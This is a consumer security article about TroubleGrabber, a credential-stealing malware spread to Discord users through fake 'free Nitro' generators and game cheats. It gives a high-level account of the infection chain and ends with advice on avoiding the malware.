An info-stealing malware, called TroubleGrabber, collects login credentials, system information, and other data of Discord users until reported or deleted.
A cybersecurity company, Sophos, has issued a warning against malware called TroubleGrabber, mostly found within the Discord platform. As the report goes, this communication platform has become an increasingly common target for various malware creators and hackers in the previous years.
Discord is a social platform used by gamers for private chats, text messages, file exchanges, and video/voice calls to facilitate their gaming sessions. Gamers like Discord for its highly flexible app and customizable features that help speed up their usual communication. Discord helps them organize content according to different hashtags, groups, categories, or rooms.
The biggest problem with Discord, however, is that the number of malware threats exploiting its popularity is growing. While Discord scams are nothing new, they are now becoming more invasive and spreading even faster than before. One such example is the TroubleGrabber malware
TroubleGrabber was first discovered by researchers from Netskope at the end of 2020. It was later discovered that the developer who created the malware goes under the pseudonym Ithoublve, and has an email address, website, YouTube channel, and even a Facebook page under the same name! His Discord server has close to 600 members, and he hosts a malware generator on a public GitHub account that allows other hackers to use and contribute to his code.
TroubleGrabber is very reminiscent of the previously infamous AnarchyGrabber. However, thanks to a couple of distinctive functions it has, it can spread itself on Discord friend lists much more quickly. To make things worse, TroubleGrabber's creator has even created a YouTube tutorial video that is supposed to explain its use, helping the malware spread even faster.
Beware of the "free Nitro upgrade"
Many victims of this malware admitted opening the TroubleGrabber file, tricked into thinking that it's a link to a gift code for a one-month Nitro upgrade on Discord. Keep in mind that the Discord Nitro option charges a subscription fee, and that opening such links, as well as the regular use of cracks or cheat programs (called trainers), increases your risks of accidentally installing TroubleGrabber.
According to the researchers, TroubleGrabber mostly presents itself as some sort of game cheat, hack, or mode, and sometimes even as a Discord Installer.
How to stay protected from TroubleGrabber malware?
The attack begins with the delivery of the Discord attachment or link to a target user. The link then leads to an archive that contains an executable file. Both attachment and link will take the form of a legitimate app upgrade called Discord Nitro Generator. After the exe isexecuted, five additional payloads are dropped onto the compromised computer - Tokenstealer.bat, Tokenstealer.vbs, Curl.exe, Sendhookfile.exe, and WebBrowserPassView.exe.
Tokenstealer.bat coordinates the most harmful activities of this malware, while the rest of the payloads harvest and save the victim's passwords, exfiltrate data to the raider's Discord server, and execute the cleanup processes to hide most of the traces. As the last step of the entire process, TroubleGrabber restarts the compromised device.
Admittedly, it can be very hard to distinguish between a genuine Discord installation file and a corrupted one. To help you avoid the TroubleGrabber, here's a reminder of some efficient malware avoidance strategies.
TroubleGrabber avoidance dos:
- Use only the official Discord website to download the platform
- Use only the official Discord software installer for the upgrades
- Regularly update your Discord passwords
- Your Discord passwords should differ from all your other passwords
- Use very strong passwords for all your online accounts, including Discord
- Regularly update your OS and malware protection
- Try some of the best VPNs for Discord, most of them have built-in ad blockers and malware protection
TroubleGrabber avoidance don'ts:
- Never download Discord from a third-party website, only its official one
- Don't fall for "free Nitro generators", this service is a paid subscription
- Never open anonymous or otherwise suspicious messages and links